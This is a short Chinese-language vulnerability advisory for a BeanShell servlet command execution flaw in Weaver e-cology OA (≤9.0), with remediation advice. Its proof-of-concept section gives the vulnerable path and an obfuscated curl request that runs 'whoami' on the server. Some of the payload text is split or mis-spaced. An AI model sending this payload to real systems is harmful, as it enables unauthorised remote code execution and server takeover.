0x01漏洞描述
泛微OA辦公系統是一款協調辦公軟件。
泛微協同商務軟件系統存在命令執行漏洞,攻擊者可利用該漏洞獲取服務器權限。
0x02漏洞危害
攻擊者可以通過精心構造的請求包在受影響版本的泛微OA上進行遠程代碼執行。
0x03影響範圍
泛微 e-cology<=9.0
0x04漏洞復現
訪問 http://url/weaver/bsh.servlet.BshServlet 輸入 payload 如下:
0x05poc
漏洞路徑:/weaver/bsh.servlet.BshServlet
exec("whoami")
curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev
al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'
0x06修復方案
1、屏蔽/weaver/*目錄的訪問;
2、https://www.weaver.com.cn/cs/securityDownload.asp